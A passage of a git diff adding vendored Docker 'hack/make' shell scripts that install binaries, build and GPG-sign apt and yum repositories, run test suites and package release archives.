+	for L in $(find -L . -mount -depth -maxdepth 1 -type f ! -name 'index' ! -name '.*' -prune -printf "%f|@_@%Td-%Tb-%TY %Tk:%TM  @%f@\n"|sort|column -t -s '|' | sed 's,\([\ ]\+\)@_@,\1,g');
+	do
+		# file
+		F=$(sed -e 's,^.*@\([^@]\+\)@.*$,\1,g'<<<"$L");
+
+		# file with file size
+		F=$(du -bh $F | cut -f1);
+
+		# output with correct format
+		sed -e 's,\ @.*$, '"$F"',g'<<<"$L";
+	done;
+	) >> $index_file;
+
+	# now output a list of all directories in this dir (maxdepth 1) other than '.' outputting in a sorted manner exactly like apache
+	find -L . -mount -depth -maxdepth 1 -type d ! -name '.' -printf "%-43f@_@%Td-%Tb-%TY %Tk:%TM  -\n"|sort -d|sed 's,\([\ ]\+\)@_@,/\1,g' >> $index_file
+
+	# print the footer html
+	echo "

" >> $index_file + +} + +get_dirs() { + local directory=$1 + + for d in `find ${directory} -type d`; do + create_index $d $directory + done +} + +get_dirs $APTDIR +get_dirs $YUMDIR diff --git a/vendor/github.com/docker/docker/hack/make/install-binary b/vendor/github.com/docker/docker/hack/make/install-binary new file mode 100644 index 0000000000..82cbc79933 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-binary @@ -0,0 +1,12 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +( + source "${MAKEDIR}/install-binary-client" +) + +( + source "${MAKEDIR}/install-binary-daemon" +) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-client b/vendor/github.com/docker/docker/hack/make/install-binary-client new file mode 100644 index 0000000000..6c80452659 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-binary-client @@ -0,0 +1,10 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +( + DEST="$(dirname $DEST)/binary-client" + source "${MAKEDIR}/.binary-setup" + install_binary "${DEST}/${DOCKER_CLIENT_BINARY_NAME}" +) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-daemon b/vendor/github.com/docker/docker/hack/make/install-binary-daemon new file mode 100644 index 0000000000..08a2d69b96 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-binary-daemon @@ -0,0 +1,16 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +( + DEST="$(dirname $DEST)/binary-daemon" + source "${MAKEDIR}/.binary-setup" + install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}" +) diff --git a/vendor/github.com/docker/docker/hack/make/install-script 
b/vendor/github.com/docker/docker/hack/make/install-script new file mode 100644 index 0000000000..feadac2f38 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-script @@ -0,0 +1,63 @@ +#!/bin/bash +set -e + +# This script modifies the install.sh script for domains and keys other than +# those used by the primary opensource releases. +# +# You can provide `url`, `yum_url`, `apt_url` and optionally `gpg_fingerprint` +# or `GPG_KEYID` as environment variables, or the defaults for open source are used. +# +# The lower-case variables are substituted into install.sh. +# +# gpg_fingerprint and GPG_KEYID are optional, defaulting to the opensource release +# key ("releasedocker"). Other GPG_KEYIDs will require you to mount a volume with +# the correct contents to /root/.gnupg. +# +# It outputs the modified `install.sh` file to $DOCKER_RELEASE_DIR (default: $DEST) +# +# Example usage: +# +# docker run \ +# --rm \ +# --privileged \ +# -e "GPG_KEYID=deadbeef" \ +# -e "GNUPGHOME=/root/.gnupg" \ +# -v $HOME/.gnupg:/root/.gnupg \ +# -v $(pwd):/go/src/github.com/docker/docker/bundles \ +# "$IMAGE_DOCKER" \ +# hack/make.sh install-script + +: ${DOCKER_RELEASE_DIR:=$DEST} +: ${GPG_KEYID:=releasedocker} + +DEFAULT_URL="https://get.docker.com/" +DEFAULT_APT_URL="https://apt.dockerproject.org" +DEFAULT_YUM_URL="https://yum.dockerproject.org" +DEFAULT_GPG_FINGERPRINT="58118E89F3A912897C070ADBF76221572C52609D" + +: ${url:=$DEFAULT_URL} +: ${apt_url:=$DEFAULT_APT_URL} +: ${yum_url:=$DEFAULT_YUM_URL} +if [[ "$GPG_KEYID" == "releasedocker" ]] ; then + : ${gpg_fingerprint:=$DEFAULT_GPG_FINGERPRINT} +fi + +DEST_FILE="$DOCKER_RELEASE_DIR/install.sh" + +bundle_install_script() { + mkdir -p "$DOCKER_RELEASE_DIR" + + if [[ -z "$gpg_fingerprint" ]] ; then + # NOTE: if no key matching key is in /root/.gnupg, this will fail + gpg_fingerprint=$(gpg --with-fingerprint -k "$GPG_KEYID" | grep "Key fingerprint" | awk -F "=" '{print $2};' | tr -d ' ') + fi + + cp hack/install.sh 
"$DEST_FILE" + sed -i.bak 's#^url=".*"$#url="'"$url"'"#' "$DEST_FILE" + sed -i.bak 's#^apt_url=".*"$#apt_url="'"$apt_url"'"#' "$DEST_FILE" + sed -i.bak 's#^yum_url=".*"$#yum_url="'"$yum_url"'"#' "$DEST_FILE" + sed -i.bak 's#^gpg_fingerprint=".*"$#gpg_fingerprint="'"$gpg_fingerprint"'"#' "$DEST_FILE" + rm "${DEST_FILE}.bak" +} + +bundle_install_script diff --git a/vendor/github.com/docker/docker/hack/make/release-deb b/vendor/github.com/docker/docker/hack/make/release-deb new file mode 100755 index 0000000000..ed65fe2f5f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/release-deb @@ -0,0 +1,163 @@ +#!/bin/bash +set -e + +# This script creates the apt repos for the .deb files generated by hack/make/build-deb +# +# The following can then be used as apt sources: +# deb http://apt.dockerproject.org/repo $distro-$release $version +# +# For example: +# deb http://apt.dockerproject.org/repo ubuntu-trusty main +# deb http://apt.dockerproject.org/repo ubuntu-trusty testing +# deb http://apt.dockerproject.org/repo debian-wheezy experimental +# deb http://apt.dockerproject.org/repo debian-jessie main +# +# ... 
and so on and so forth for the builds created by hack/make/build-deb + +: ${DOCKER_RELEASE_DIR:=$DEST} +: ${GPG_KEYID:=releasedocker} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo + +# setup the apt repo (if it does not exist) +mkdir -p "$APTDIR/conf" "$APTDIR/db" "$APTDIR/dists" + +# supported arches/sections +arches=( amd64 i386 armhf ) + +# Preserve existing components but don't add any non-existing ones +for component in main testing experimental ; do + exists=$(find "$APTDIR/dists" -mindepth 2 -maxdepth 2 -type d -name "$component" -print -quit) + if [ -n "$exists" ] ; then + components+=( $component ) + fi +done + +# set the component for the version being released +component="main" + +if [[ "$VERSION" == *-rc* ]]; then + component="testing" +fi + +if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + component="experimental" +fi + +# Make sure our component is in the list of components +if [[ ! "${components[*]}" =~ $component ]] ; then + components+=( $component ) +fi + +# create apt-ftparchive file on every run. This is essential to avoid +# using stale versions of the config file that could cause unnecessary +# refreshing of bits for EOL-ed releases. +cat <<-EOF > "$APTDIR/conf/apt-ftparchive.conf" +Dir { + ArchiveDir "${APTDIR}"; + CacheDir "${APTDIR}/db"; +}; + +Default { + Packages::Compress ". gzip bzip2"; + Sources::Compress ". gzip bzip2"; + Contents::Compress ". 
gzip bzip2"; +}; + +TreeDefault { + BinCacheDB "packages-\$(SECTION)-\$(ARCH).db"; + Directory "pool/\$(SECTION)"; + Packages "\$(DIST)/\$(SECTION)/binary-\$(ARCH)/Packages"; + SrcDirectory "pool/\$(SECTION)"; + Sources "\$(DIST)/\$(SECTION)/source/Sources"; + Contents "\$(DIST)/\$(SECTION)/Contents-\$(ARCH)"; + FileList "$APTDIR/\$(DIST)/\$(SECTION)/filelist"; +}; +EOF + +for dir in bundles/$VERSION/build-deb/*/; do + version="$(basename "$dir")" + suite="${version//debootstrap-}" + + cat <<-EOF + Tree "dists/${suite}" { + Sections "${components[*]}"; + Architectures "${arches[*]}"; + } + + EOF +done >> "$APTDIR/conf/apt-ftparchive.conf" + +cat <<-EOF > "$APTDIR/conf/docker-engine-release.conf" +APT::FTPArchive::Release::Origin "Docker"; +APT::FTPArchive::Release::Components "${components[*]}"; +APT::FTPArchive::Release::Label "Docker APT Repository"; +APT::FTPArchive::Release::Architectures "${arches[*]}"; +EOF + +# release the debs +for dir in bundles/$VERSION/build-deb/*/; do + version="$(basename "$dir")" + codename="${version//debootstrap-}" + + tempdir="$(mktemp -d /tmp/tmp-docker-release-deb.XXXXXXXX)" + DEBFILE=( "$dir/docker-engine"*.deb ) + + # add the deb for each component for the distro version into the + # pool (if it is not there already) + mkdir -p "$APTDIR/pool/$component/d/docker-engine/" + for deb in ${DEBFILE[@]}; do + d=$(basename "$deb") + # We do not want to generate a new deb if it has already been + # copied into the APTDIR + if [ ! -f "$APTDIR/pool/$component/d/docker-engine/$d" ]; then + cp "$deb" "$tempdir/" + # if we have a $GPG_PASSPHRASE we may as well + # dpkg-sign before copying the deb into the pool + if [ ! 
-z "$GPG_PASSPHRASE" ]; then + dpkg-sig -g "--no-tty --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE'" \ + -k "$GPG_KEYID" --sign builder "$tempdir/$d" + fi + mv "$tempdir/$d" "$APTDIR/pool/$component/d/docker-engine/" + fi + done + + rm -rf "$tempdir" + + # build the right directory structure, needed for apt-ftparchive + for arch in "${arches[@]}"; do + for c in "${components[@]}"; do + mkdir -p "$APTDIR/dists/$codename/$c/binary-$arch" + done + done + + # update the filelist for this codename/component + find "$APTDIR/pool/$component" \ + -name *~${codename}*.deb -o \ + -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" +done + +# run the apt-ftparchive commands so we can have pinning +apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" + +for dir in bundles/$VERSION/build-deb/*/; do + version="$(basename "$dir")" + codename="${version//debootstrap-}" + + apt-ftparchive \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + release \ + "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" + + for arch in "${arches[@]}"; do + apt-ftparchive \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + -o "APT::FTPArchive::Release::Components=$component" \ + -o "APT::FTPArchive::Release::Architecture=$arch" \ + release \ + "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" + done +done diff --git a/vendor/github.com/docker/docker/hack/make/release-rpm b/vendor/github.com/docker/docker/hack/make/release-rpm new file mode 100755 index 0000000000..d7e3ec4f8a --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/release-rpm @@ -0,0 +1,71 @@ +#!/bin/bash +set -e + +# This script creates the yum repos for the .rpm files generated by hack/make/build-rpm +# +# The 
following can then be used as a yum repo: +# http://yum.dockerproject.org/repo/$release/$distro/$distro-version +# +# For example: +# http://yum.dockerproject.org/repo/main/fedora/23 +# http://yum.dockerproject.org/repo/testing/centos/7 +# http://yum.dockerproject.org/repo/experimental/fedora/23 +# http://yum.dockerproject.org/repo/main/centos/7 +# +# ... and so on and so forth for the builds created by hack/make/build-rpm + +: ${DOCKER_RELEASE_DIR:=$DEST} +YUMDIR=$DOCKER_RELEASE_DIR/yum/repo +: ${GPG_KEYID:=releasedocker} + +# get the release +release="main" + +if [[ "$VERSION" == *-rc* ]]; then + release="testing" +fi + +if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + release="experimental" +fi + +# Setup the yum repo +for dir in bundles/$VERSION/build-rpm/*/; do + version="$(basename "$dir")" + suite="${version##*-}" + distro="${version%-*}" + + REPO=$YUMDIR/$release/$distro + + # if the directory does not exist, initialize the yum repo + if [[ ! -d $REPO/$suite/Packages ]]; then + mkdir -p "$REPO/$suite/Packages" + + createrepo --pretty "$REPO/$suite" + fi + + # path to rpms + RPMFILE=( "bundles/$VERSION/build-rpm/$version/RPMS/"*"/docker-engine"*.rpm "bundles/$VERSION/build-rpm/$version/SRPMS/docker-engine"*.rpm ) + + # if we have a $GPG_PASSPHRASE we may as well + # sign the rpms before adding to repo + if [ ! 
-z $GPG_PASSPHRASE ]; then + # export our key to rpm import + gpg --armor --export "$GPG_KEYID" > /tmp/gpg + rpm --import /tmp/gpg + + # sign the rpms + echo "yes" | setsid rpm \ + --define "_gpg_name $GPG_KEYID" \ + --define "_signature gpg" \ + --define "__gpg_check_password_cmd /bin/true" \ + --define "__gpg_sign_cmd %{__gpg} gpg --batch --no-armor --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE' --no-secmem-warning -u '%{_gpg_name}' --sign --detach-sign --output %{__signature_filename} %{__plaintext_filename}" \ + --resign "${RPMFILE[@]}" + fi + + # copy the rpms to the packages folder + cp "${RPMFILE[@]}" "$REPO/$suite/Packages" + + # update the repo + createrepo --pretty --update "$REPO/$suite" +done diff --git a/vendor/github.com/docker/docker/hack/make/run b/vendor/github.com/docker/docker/hack/make/run new file mode 100644 index 0000000000..37cfd53b5f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/run @@ -0,0 +1,44 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +if ! 
command -v dockerd &> /dev/null; then + echo >&2 'error: binary-daemon or dynbinary-daemon must be run before run' + false +fi + +DOCKER_GRAPHDRIVER=${DOCKER_GRAPHDRIVER:-vfs} +DOCKER_USERLANDPROXY=${DOCKER_USERLANDPROXY:-true} + +# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +storage_params="" +if [ -n "$DOCKER_STORAGE_OPTS" ]; then + IFS=',' + for i in ${DOCKER_STORAGE_OPTS}; do + storage_params="--storage-opt $i $storage_params" + done + unset IFS +fi + + +listen_port=2375 +if [ -n "$DOCKER_PORT" ]; then + IFS=':' read -r -a ports <<< "$DOCKER_PORT" + listen_port="${ports[-1]}" +fi + +extra_params="" +if [ "$DOCKER_REMAP_ROOT" ]; then + extra_params="--userns-remap $DOCKER_REMAP_ROOT" +fi + +args="--debug \ + --host tcp://0.0.0.0:${listen_port} --host unix:///var/run/docker.sock \ + --storage-driver "$DOCKER_GRAPHDRIVER" \ + --userland-proxy="$DOCKER_USERLANDPROXY" \ + $storage_params \ + $extra_params" + +echo dockerd $args +exec dockerd $args diff --git a/vendor/github.com/docker/docker/hack/make/sign-repos b/vendor/github.com/docker/docker/hack/make/sign-repos new file mode 100755 index 0000000000..6ed1606885 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/sign-repos @@ -0,0 +1,65 @@ +#!/bin/bash + +# This script signs the deliverables from release-deb and release-rpm +# with a designated GPG key. + +: ${DOCKER_RELEASE_DIR:=$DEST} +: ${GPG_KEYID:=releasedocker} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo +YUMDIR=$DOCKER_RELEASE_DIR/yum/repo + +if [ -z "$GPG_PASSPHRASE" ]; then + echo >&2 'you need to set GPG_PASSPHRASE in order to sign artifacts' + exit 1 +fi + +if [ ! -d $APTDIR ] && [ ! 
-d $YUMDIR ]; then + echo >&2 'release-rpm or release-deb must be run before sign-repos' + exit 1 +fi + +sign_packages(){ + # sign apt repo metadata + if [ -d $APTDIR ]; then + # create file with public key + gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/apt/gpg" + + # sign the repo metadata + for F in $(find $APTDIR -name Release); do + if test "$F" -nt "$F.gpg" ; then + gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ + --digest-algo "sha512" \ + --armor --sign --detach-sign \ + --batch --yes \ + --output "$F.gpg" "$F" + fi + inRelease="$(dirname "$F")/InRelease" + if test "$F" -nt "$inRelease" ; then + gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ + --digest-algo "sha512" \ + --clearsign \ + --batch --yes \ + --output "$inRelease" "$F" + fi + done + fi + + # sign yum repo metadata + if [ -d $YUMDIR ]; then + # create file with public key + gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/yum/gpg" + + # sign the repo metadata + for F in $(find $YUMDIR -name repomd.xml); do + if test "$F" -nt "$F.asc" ; then + gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ + --digest-algo "sha512" \ + --armor --sign --detach-sign \ + --batch --yes \ + --output "$F.asc" "$F" + fi + done + fi +} + +sign_packages diff --git a/vendor/github.com/docker/docker/hack/make/test-deb-install b/vendor/github.com/docker/docker/hack/make/test-deb-install new file mode 100755 index 0000000000..aec5847600 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-deb-install @@ -0,0 +1,71 @@ +#!/bin/bash +# This script is used for testing install.sh and that it works for +# each of component of our apt and yum repos +set -e + +: ${DEB_DIR:="$(pwd)/bundles/$(cat VERSION)/build-deb"} + +if [[ ! 
-d "${DEB_DIR}" ]]; then + echo "you must first run `make deb` or hack/make/build-deb" + exit 1 +fi + +test_deb_install(){ + # test for each Dockerfile in contrib/builder + + builderDir="contrib/builder/deb/${PACKAGE_ARCH}" + pkgs=( $(find "${builderDir}/"*/ -type d) ) + if [ ! -z "$DOCKER_BUILD_PKGS" ]; then + pkgs=() + for p in $DOCKER_BUILD_PKGS; do + pkgs+=( "$builderDir/$p" ) + done + fi + for dir in "${pkgs[@]}"; do + [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } + local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" + local dir=$(basename "$dir") + + if [[ ! -d "${DEB_DIR}/${dir}" ]]; then + echo "No deb found for ${dir}" + exit 1 + fi + + local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) + cat <<-EOF > "${script}" + #!/bin/bash + set -e + set -x + + apt-get update && apt-get install -y apparmor + + dpkg -i /root/debs/*.deb || true + + apt-get install -yf + + /etc/init.d/apparmor start + + # this will do everything _except_ load the profile into the kernel + ( + cd /etc/apparmor.d + /sbin/apparmor_parser --skip-kernel-load docker-engine + ) + EOF + + chmod +x "${script}" + + echo "testing deb install for ${from}" + docker run --rm -i --privileged \ + -v ${DEB_DIR}/${dir}:/root/debs \ + -v ${script}:/install.sh \ + ${from} /install.sh + + rm -f ${script} + done +} + +( + bundle .integration-daemon-start + test_deb_install + bundle .integration-daemon-stop +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-docker-py b/vendor/github.com/docker/docker/hack/make/test-docker-py new file mode 100644 index 0000000000..fcacc16436 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-docker-py @@ -0,0 +1,20 @@ +#!/bin/bash +set -e + +source hack/make/.integration-test-helpers + +# subshell so that we can export PATH without breaking other things +( + bundle .integration-daemon-start + + dockerPy='/docker-py' + [ -d "$dockerPy" ] || { + dockerPy="$DEST/docker-py" 
+ git clone https://github.com/docker/docker-py.git "$dockerPy" + } + + # exporting PYTHONPATH to import "docker" from our local docker-py + test_env PYTHONPATH="$dockerPy" py.test --junitxml="$DEST/results.xml" "$dockerPy/tests/integration" + + bundle .integration-daemon-stop +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-install-script b/vendor/github.com/docker/docker/hack/make/test-install-script new file mode 100755 index 0000000000..4782cbea88 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-install-script @@ -0,0 +1,31 @@ +#!/bin/bash +# This script is used for testing install.sh and that it works for +# each of component of our apt and yum repos +set -e + +test_install_script(){ + # these are equivalent to main, testing, experimental components + # in the repos, but its the url that will do the conversion + components=( experimental test get ) + + for component in "${components[@]}"; do + # change url to specific component for testing + local test_url=https://${component}.docker.com + local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) + sed "s,url='https://get.docker.com/',url='${test_url}/'," hack/install.sh > "${script}" + + chmod +x "${script}" + + # test for each Dockerfile in contrib/builder + for dir in contrib/builder/*/*/; do + local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" + + echo "running install.sh for ${component} with ${from}" + docker run --rm -i -v ${script}:/install.sh ${from} /install.sh + done + + rm -f ${script} + done +} + +test_install_script diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-cli b/vendor/github.com/docker/docker/hack/make/test-integration-cli new file mode 100755 index 0000000000..689a5285f3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-integration-cli @@ -0,0 +1,28 @@ +#!/bin/bash +set -e + +source hack/make/.integration-test-helpers + +# subshell so that we can export PATH 
without breaking other things +( + bundle .integration-daemon-start + + bundle .integration-daemon-setup + + bundle_test_integration_cli + + bundle .integration-daemon-stop + + if [ "$(go env GOOS)" != 'windows' ] + then + leftovers=$(ps -ax -o pid,cmd | awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration-cli/ { print $1 }') + if [ -n "$leftovers" ] + then + ps aux + kill -9 $leftovers 2> /dev/null + echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!" + exit 1 + fi + fi + +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-shell b/vendor/github.com/docker/docker/hack/make/test-integration-shell new file mode 100644 index 0000000000..86df9654a3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-integration-shell @@ -0,0 +1,7 @@ +#!/bin/bash + +bundle .integration-daemon-start +bundle .integration-daemon-setup + +export ABS_DEST +bash +e diff --git a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo new file mode 100755 index 0000000000..bb20128e30 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo @@ -0,0 +1,29 @@ +#!/bin/bash +set -e + +versions=( 1.3.3 1.4.1 1.5.0 1.6.2 ) + +install() { + local version=$1 + local tmpdir=$(mktemp -d /tmp/XXXXXXXXXX) + local dockerfile="${tmpdir}/Dockerfile" + cat <<-EOF > "$dockerfile" + FROM debian:jessie + ENV VERSION ${version} + RUN apt-get update && apt-get install -y \ + apt-transport-https \ + ca-certificates \ + --no-install-recommends + RUN echo "deb https://get.docker.com/ubuntu docker main" > /etc/apt/sources.list.d/docker.list + RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 \ + --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9 + RUN apt-get update && apt-get install -y \ + lxc-docker-\${VERSION} + EOF + + docker build --rm --force-rm --no-cache -t docker-old-repo:${version} -f $dockerfile 
$tmpdir +} + +for v in "${versions[@]}"; do + install "$v" +done diff --git a/vendor/github.com/docker/docker/hack/make/test-unit b/vendor/github.com/docker/docker/hack/make/test-unit new file mode 100644 index 0000000000..f263345ce6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-unit @@ -0,0 +1,55 @@ +#!/bin/bash +set -e + +# Run Docker's test suite, including sub-packages, and store their output as a bundle +# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. +# You can use this to select certain tests to run, e.g. +# +# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit +# +bundle_test_unit() { + TESTFLAGS+=" -test.timeout=${TIMEOUT}" + INCBUILD="-i" + count=0 + for flag in "${BUILDFLAGS[@]}"; do + if [ "${flag}" == ${INCBUILD} ]; then + unset BUILDFLAGS[${count}] + break + fi + count=$[ ${count} + 1 ] + done + + date + if [ -z "$TESTDIRS" ]; then + TEST_PATH=./... + else + TEST_PATH=./${TESTDIRS} + fi + + if [ "$(go env GOHOSTOS)" = 'solaris' ]; then + pkg_list=$(go list -e \ + -f '{{if ne .Name "github.com/docker/docker"}} + {{.ImportPath}} + {{end}}' \ + "${BUILDFLAGS[@]}" $TEST_PATH \ + | grep github.com/docker/docker \ + | grep -v github.com/docker/docker/vendor \ + | grep -v github.com/docker/docker/daemon/graphdriver \ + | grep -v github.com/docker/docker/man \ + | grep -v github.com/docker/docker/integration-cli) + else + pkg_list=$(go list -e \ + -f '{{if ne .Name "github.com/docker/docker"}} + {{.ImportPath}} + {{end}}' \ + "${BUILDFLAGS[@]}" $TEST_PATH \ + | grep github.com/docker/docker \ + | grep -v github.com/docker/docker/vendor \ + | grep -v github.com/docker/docker/man \ + | grep -v github.com/docker/docker/integration-cli) + fi + + go test -cover -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" $TESTFLAGS $pkg_list +} + +bundle_test_unit 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/tgz b/vendor/github.com/docker/docker/hack/make/tgz new file mode 
100644 index 0000000000..3ccd93fa01 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/tgz @@ -0,0 +1,92 @@ +#!/bin/bash + +CROSS="$DEST/../cross" + +set -e + +arch=$(go env GOHOSTARCH) +if [ ! -d "$CROSS/linux/${arch}" ]; then + echo >&2 'error: binary and cross must be run before tgz' + false +fi + +( +for d in "$CROSS/"*/*; do + export GOARCH="$(basename "$d")" + export GOOS="$(basename "$(dirname "$d")")" + + source "${MAKEDIR}/.binary-setup" + + BINARY_NAME="${DOCKER_CLIENT_BINARY_NAME}-$VERSION" + DAEMON_BINARY_NAME="${DOCKER_DAEMON_BINARY_NAME}-$VERSION" + PROXY_BINARY_NAME="${DOCKER_PROXY_BINARY_NAME}-$VERSION" + BINARY_EXTENSION="$(export GOOS && binary_extension)" + if [ "$GOOS" = 'windows' ]; then + # if windows use a zip, not tgz + BUNDLE_EXTENSION=".zip" + IS_TAR="false" + elif [ "$GOOS" == "solaris" ]; then + # Solaris bypasses cross due to CGO issues. + continue + else + BUNDLE_EXTENSION=".tgz" + IS_TAR="true" + fi + BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" + DAEMON_BINARY_FULLNAME="$DAEMON_BINARY_NAME$BINARY_EXTENSION" + PROXY_BINARY_FULLNAME="$PROXY_BINARY_NAME$BINARY_EXTENSION" + mkdir -p "$DEST/$GOOS/$GOARCH" + TGZ="$DEST/$GOOS/$GOARCH/$BINARY_NAME$BUNDLE_EXTENSION" + + # The staging directory for the files in the tgz + BUILD_PATH="$DEST/build" + + # The directory that is at the root of the tar file + TAR_BASE_DIRECTORY="docker" + + # $DEST/build/docker + TAR_PATH="$BUILD_PATH/$TAR_BASE_DIRECTORY" + + # Copy the correct docker binary + mkdir -p $TAR_PATH + cp -L "$d/$BINARY_FULLNAME" "$TAR_PATH/${DOCKER_CLIENT_BINARY_NAME}${BINARY_EXTENSION}" + if [ -f "$d/$DAEMON_BINARY_FULLNAME" ]; then + cp -L "$d/$DAEMON_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_DAEMON_BINARY_NAME}${BINARY_EXTENSION}" + fi + if [ -f "$d/$PROXY_BINARY_FULLNAME" ]; then + cp -L "$d/$PROXY_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_PROXY_BINARY_NAME}${BINARY_EXTENSION}" + fi + + # copy over all the extra binaries + copy_binaries $TAR_PATH + + # add completions + for s in 
bash fish zsh; do + mkdir -p $TAR_PATH/completion/$s + cp -L contrib/completion/$s/*docker* $TAR_PATH/completion/$s/ + done + + if [ "$IS_TAR" == "true" ]; then + echo "Creating tgz from $BUILD_PATH and naming it $TGZ" + tar --numeric-owner --owner 0 -C "$BUILD_PATH" -czf "$TGZ" $TAR_BASE_DIRECTORY + else + # ZIP needs to full absolute dir path, not the absolute path + ZIP=`pwd`"/$TGZ" + # keep track of where we are, for later. + pushd . + # go into the BUILD_PATH since zip does not have a -C equivalent. + cd $BUILD_PATH + echo "Creating zip from $BUILD_PATH and naming it $ZIP" + zip -q -r $ZIP $TAR_BASE_DIRECTORY + # go back to where we started + popd + fi + + hash_files "$TGZ" + + # cleanup after ourselves + rm -rf "$BUILD_PATH" + + echo "Created tgz: $TGZ" +done +) diff --git a/vendor/github.com/docker/docker/hack/make/ubuntu b/vendor/github.com/docker/docker/hack/make/ubuntu new file mode 100644 index 0000000000..8de5d9ceac --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/ubuntu @@ -0,0 +1,190 @@ +#!/bin/bash + +PKGVERSION="${VERSION//-/'~'}" +# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better +if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + GIT_UNIX="$(git log -1 --pretty='%at')" + GIT_DATE="$(date --date "@$GIT_UNIX" +'%Y%m%d.%H%M%S')" + GIT_COMMIT="$(git log -1 --pretty='%h')" + GIT_VERSION="git${GIT_DATE}.0.${GIT_COMMIT}" + # GIT_VERSION is now something like 'git20150128.112847.0.17e840a' + PKGVERSION="$PKGVERSION~$GIT_VERSION" +fi + +# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false +# true +# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false +# true +# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false +# true + +# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 
